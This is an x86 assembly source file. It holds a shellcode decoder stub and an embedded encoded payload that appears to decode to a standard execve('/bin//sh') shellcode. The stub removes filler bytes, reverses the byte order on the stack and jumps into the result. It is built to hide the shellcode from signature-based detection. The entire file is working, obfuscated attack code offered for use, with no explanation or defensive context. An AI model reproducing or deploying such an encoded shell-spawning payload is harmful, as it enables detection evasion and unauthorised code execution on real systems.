;Decodes reversed shellcode and removes a random character between every two characters
;works with encode_reverse.py
;Author: evil_comrade

global _start
section prog write exec
_start:
	jmp short shellcode 
decoder:
	pop esi
	lea edi, [esi +1]            
	xor eax, eax		 
	mov al, 1		    
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]   
	xor bl, 0xff              
	jz short InvertShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl         
	inc edi			  
	add al, 2		 
	jmp short decode	
InvertShellcode:
	xor ecx, ecx
	mov cl, 7
decode2:
	mov eax, dword [esi]
	bswap eax
	push eax
	add esi, 4
	loop decode2
	jmp esp	
shellcode:
	call decoder
	ReversedShellcode: db 0x80,0x36,0xcd,0xf4,0x40,0xaf,0x40,0x9d,0x40,0x52,0x08,0xa3,0xb0,0x6c,0xe1,0xa0,0x89,0xc4,0x53,0x87,0xe2,0x7e,0x89,0xee,0x50,0x52,0xe3,0x9b,0x89,0x78,0x6e,0x1d,0x69,0x49,0x62,0x87,0x2f,0x5d,0x68,0x3d,0x68,0x45,0x73,0xa3,0x2f,0xba,0x2f,0x90,0x68,0x64,0x50,0x27,0xc0,0x91,0x31,0x6a,0xff
